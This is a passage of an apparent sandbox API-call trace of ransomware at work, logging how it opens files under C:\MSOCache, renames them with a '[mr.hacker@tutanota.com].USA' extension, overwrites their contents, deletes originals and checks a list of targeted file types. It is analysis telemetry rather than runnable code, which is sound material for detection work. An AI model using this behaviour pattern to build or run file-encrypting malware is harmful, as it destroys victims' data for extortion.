lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0104, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0104, lpOverlapped=0x0) returned 1 [0052.202] SetEndOfFile (hFile=0x1f4) returned 1 [0052.202] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3fa70b0 [0052.202] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.202] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.203] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0xb84a74, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.203] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.203] SetFilePointerEx (in: hFile=0x1f4, liDistanceToMove=0x224df5c, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.203] WriteFile (in: hFile=0x1f4, lpBuffer=0x3fa70b0*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3fa70b0*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.205] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3fa70b0 | out: hHeap=0x5d0000) returned 1 [0052.205] CloseHandle (hObject=0x1f4) returned 1 [0052.206] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.206] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.206] lstrlenW (lpString=".doc") returned 4 [0052.206] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString=".docx") returned 5 [0052.207] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0052.207] lstrlenW (lpString=".pdf") returned 4 [0052.207] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString=".xls") returned 4 [0052.207] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString=".xlsx") returned 5 [0052.207] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0052.207] lstrlenW (lpString=".ppt") returned 4 [0052.207] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.207] lstrlenW (lpString=".zip") returned 4 [0052.207] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString=".rar") returned 4 [0052.207] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString=".bz2") returned 4 [0052.207] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0052.207] lstrlenW (lpString=".7z") returned 3 [0052.207] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0052.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.207] lstrlenW (lpString=".dbf") returned 4 [0052.207] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.207] lstrlenW (lpString=".1cd") returned 4 [0052.207] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0052.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.207] lstrlenW (lpString=".jpg") returned 4 [0052.207] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0052.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.207] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.207] lstrlenW (lpString=".doc") returned 4 [0052.207] lstrcmpiW (lpString1=".doc", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString=".docx") returned 5 [0052.208] lstrcmpiW (lpString1=".docx", lpString2="W.cab") returned -1 [0052.208] lstrlenW (lpString=".pdf") returned 4 [0052.208] lstrcmpiW (lpString1=".pdf", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString=".xls") returned 4 [0052.208] lstrcmpiW (lpString1=".xls", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString=".xlsx") returned 5 [0052.208] lstrcmpiW (lpString1=".xlsx", lpString2="W.cab") returned -1 [0052.208] lstrlenW (lpString=".ppt") returned 4 [0052.208] lstrcmpiW (lpString1=".ppt", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.208] lstrlenW (lpString=".zip") returned 4 [0052.208] lstrcmpiW (lpString1=".zip", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString=".rar") returned 4 [0052.208] lstrcmpiW (lpString1=".rar", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString=".bz2") returned 4 [0052.208] lstrcmpiW (lpString1=".bz2", lpString2=".cab") returned -1 [0052.208] lstrlenW (lpString=".7z") returned 3 [0052.208] lstrcmpiW (lpString1=".7z", lpString2="cab") returned -1 [0052.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.208] lstrlenW (lpString=".dbf") returned 4 [0052.208] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0052.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.208] lstrlenW (lpString=".1cd") returned 4 [0052.208] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0052.208] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\OWOW32WW.cab") returned 75 [0052.208] lstrlenW (lpString=".jpg") returned 4 [0052.208] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0052.208] lstrcmpiW (lpString1=".dll", lpString2=".USA") returned -1 [0052.209] lstrlenW (lpString="osetup.dll") returned 10 [0052.209] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0052.359] GetFileSizeEx (in: hFile=0x208, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=7378792) returned 1 [0052.359] CloseHandle (hObject=0x208) returned 1 [0052.359] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll")) returned 0x2020 [0052.359] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0052.359] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll"), lpNewFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 1 [0052.360] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\osetup.dll.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x208 [0052.360] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0x0) returned 1 [0052.360] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.360] ReadFile (in: hFile=0x208, lpBuffer=0x3de0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3de0058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.366] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.366] ReadFile (in: hFile=0x208, lpBuffer=0x3e20058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e20058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.381] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x375fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0052.382] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x375fc2c | out: lpNewFilePointer=0x0) returned 1 [0052.382] ReadFile (in: hFile=0x208, lpBuffer=0x3e60058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x375fc38, lpOverlapped=0x0 | out: lpBuffer=0x3e60058*, lpNumberOfBytesRead=0x375fc38*=0x40000, lpOverlapped=0x0) returned 1 [0052.489] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0052.490] WriteFile (in: hFile=0x208, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xc0100, lpNumberOfBytesWritten=0x375fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fcb0*=0xc0100, lpOverlapped=0x0) returned 1 [0052.622] SetEndOfFile (hFile=0x208) returned 1 [0052.622] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x40000) returned 0x3f20060 [0052.626] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.626] WriteFile (in: hFile=0x208, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.627] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x2587cd, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.628] WriteFile (in: hFile=0x208, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.629] SetFilePointerEx (in: hFile=0x208, liDistanceToMove=0x6c9768, lpNewFilePointer=0x0, dwMoveMethod=0x375fc7c | out: lpNewFilePointer=0x0) returned 1 [0052.629] WriteFile (in: hFile=0x208, lpBuffer=0x3f20060*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x375fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f20060*, lpNumberOfBytesWritten=0x375fc88*=0x40000, lpOverlapped=0x0) returned 1 [0052.631] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x3f20060 | out: hHeap=0x5d0000) returned 1 [0052.631] CloseHandle (hObject=0x208) returned 1 [0052.631] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0052.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.631] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.631] lstrlenW (lpString=".doc") returned 4 [0052.631] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.631] lstrlenW (lpString=".docx") returned 5 [0052.631] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0052.631] lstrlenW (lpString=".pdf") returned 4 [0052.631] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.631] lstrlenW (lpString=".xls") returned 4 [0052.631] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.631] lstrlenW (lpString=".xlsx") returned 5 [0052.631] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0052.631] lstrlenW (lpString=".ppt") returned 4 [0052.632] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString=".zip") returned 4 [0052.632] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString=".rar") returned 4 [0052.632] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString=".bz2") returned 4 [0052.632] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.632] lstrlenW (lpString=".7z") returned 3 [0052.632] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString=".dbf") returned 4 [0052.632] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString=".1cd") returned 4 [0052.632] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString=".jpg") returned 4 [0052.632] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString=".doc") returned 4 [0052.632] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString=".docx") returned 5 [0052.632] lstrcmpiW (lpString1=".docx", lpString2="p.dll") returned -1 [0052.632] lstrlenW (lpString=".pdf") returned 4 [0052.632] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString=".xls") returned 4 [0052.632] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString=".xlsx") returned 5 [0052.632] lstrcmpiW (lpString1=".xlsx", lpString2="p.dll") returned -1 [0052.632] lstrlenW (lpString=".ppt") returned 4 [0052.632] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.632] lstrlenW (lpString=".zip") returned 4 [0052.632] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0052.632] lstrlenW (lpString=".rar") returned 4 [0052.632] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0052.633] lstrlenW (lpString=".bz2") returned 4 [0052.633] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0052.633] lstrlenW (lpString=".7z") returned 3 [0052.633] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0052.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.633] lstrlenW (lpString=".dbf") returned 4 [0052.633] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0052.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.633] lstrlenW (lpString=".1cd") returned 4 [0052.633] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0052.633] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\osetup.dll") returned 73 [0052.633] lstrlenW (lpString=".jpg") returned 4 [0052.633] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0052.633] lstrcmpiW (lpString1=".exe", lpString2=".USA") returned -1 [0052.633] lstrlenW (lpString="setup.exe") returned 9 [0052.633] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0053.295] GetFileSizeEx (in: hFile=0x168, lpFileSize=0x375ff1c | out: lpFileSize=0x375ff1c*=1377656) returned 1 [0053.295] CloseHandle (hObject=0x168) returned 1 [0053.295] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 0x2020 [0053.295] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[mr.hacker@tutanota.com].usa")) returned 0xffffffff [0053.295] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x168 [0053.296] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.296] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.296] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe.id-9c354b42.[mr.hacker@tutanota.com].usa"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x160 [0053.296] GetLastError () returned 0x0 [0053.296] ReadFile (in: hFile=0x168, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0xffff0, lpOverlapped=0x0) returned 1 [0053.354] WriteFile (in: hFile=0x160, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xffff0, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xffff0, lpOverlapped=0x0) returned 1 [0053.533] ReadFile (in: hFile=0x168, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x50588, lpOverlapped=0x0) returned 1 [0053.545] WriteFile (in: hFile=0x160, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0x50590, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0x50590, lpOverlapped=0x0) returned 1 [0053.553] ReadFile (in: hFile=0x168, lpBuffer=0x3de0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x375fed4, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesRead=0x375fed4*=0x0, lpOverlapped=0x0) returned 1 [0053.553] WriteFile (in: hFile=0x160, lpBuffer=0x3de0020*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x375fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3de0020*, lpNumberOfBytesWritten=0x375fc9c*=0xe6, lpOverlapped=0x0) returned 1 [0053.553] SetEndOfFile (hFile=0x160) returned 1 [0053.794] CloseHandle (hObject=0x160) returned 1 [0053.835] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x375fec8 | out: lpNewFilePointer=0x0) returned 1 [0053.835] SetEndOfFile (hFile=0x168) returned 1 [0053.838] CloseHandle (hObject=0x168) returned 1 [0053.838] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe.id-9C354B42.[mr.hacker@tutanota.com].USA", dwFileAttributes=0x2020) returned 1 [0053.838] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe" (normalized: "c:\\msocache\\all users\\{91140000-0057-0000-1000-0000000ff1ce}-c\\setup.exe")) returned 1 [0053.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.838] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.839] lstrlenW (lpString=".doc") returned 4 [0053.839] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0053.839] lstrlenW (lpString=".docx") returned 5 [0053.839] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0053.839] lstrlenW (lpString=".pdf") returned 4 [0053.839] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0053.839] lstrlenW (lpString=".xls") returned 4 [0053.839] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0053.839] lstrlenW (lpString=".xlsx") returned 5 [0053.839] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0053.839] lstrlenW (lpString=".ppt") returned 4 [0053.839] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0053.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.839] lstrlenW (lpString=".zip") returned 4 [0053.839] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0053.839] lstrlenW (lpString=".rar") returned 4 [0053.839] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0053.839] lstrlenW (lpString=".bz2") returned 4 [0053.839] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0053.839] lstrlenW (lpString=".7z") returned 3 [0053.839] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0053.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.839] lstrlenW (lpString=".dbf") returned 4 [0053.839] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0053.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.839] lstrlenW (lpString=".1cd") returned 4 [0053.839] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0053.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.839] lstrlenW (lpString=".jpg") returned 4 [0053.839] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0053.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.840] lstrlenW (lpString=".doc") returned 4 [0053.840] lstrcmpiW (lpString1=".doc", lpString2=".exe") returned -1 [0053.840] lstrlenW (lpString=".docx") returned 5 [0053.840] lstrcmpiW (lpString1=".docx", lpString2="p.exe") returned -1 [0053.840] lstrlenW (lpString=".pdf") returned 4 [0053.840] lstrcmpiW (lpString1=".pdf", lpString2=".exe") returned 1 [0053.840] lstrlenW (lpString=".xls") returned 4 [0053.840] lstrcmpiW (lpString1=".xls", lpString2=".exe") returned 1 [0053.840] lstrlenW (lpString=".xlsx") returned 5 [0053.840] lstrcmpiW (lpString1=".xlsx", lpString2="p.exe") returned -1 [0053.840] lstrlenW (lpString=".ppt") returned 4 [0053.840] lstrcmpiW (lpString1=".ppt", lpString2=".exe") returned 1 [0053.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.840] lstrlenW (lpString=".zip") returned 4 [0053.840] lstrcmpiW (lpString1=".zip", lpString2=".exe") returned 1 [0053.840] lstrlenW (lpString=".rar") returned 4 [0053.840] lstrcmpiW (lpString1=".rar", lpString2=".exe") returned 1 [0053.840] lstrlenW (lpString=".bz2") returned 4 [0053.840] lstrcmpiW (lpString1=".bz2", lpString2=".exe") returned -1 [0053.840] lstrlenW (lpString=".7z") returned 3 [0053.840] lstrcmpiW (lpString1=".7z", lpString2="exe") returned -1 [0053.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.840] lstrlenW (lpString=".dbf") returned 4 [0053.840] lstrcmpiW (lpString1=".dbf", lpString2=".exe") returned -1 [0053.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\setup.exe") returned 72 [0053.840] lstrlenW (lpString=".1cd") returned 4 [0053.840] lstrcmpiW (lpString1=".1cd", lpString2=".exe") returned -1 [0053.840] lstrlenW (lpString="C:\\MSOCache\\All 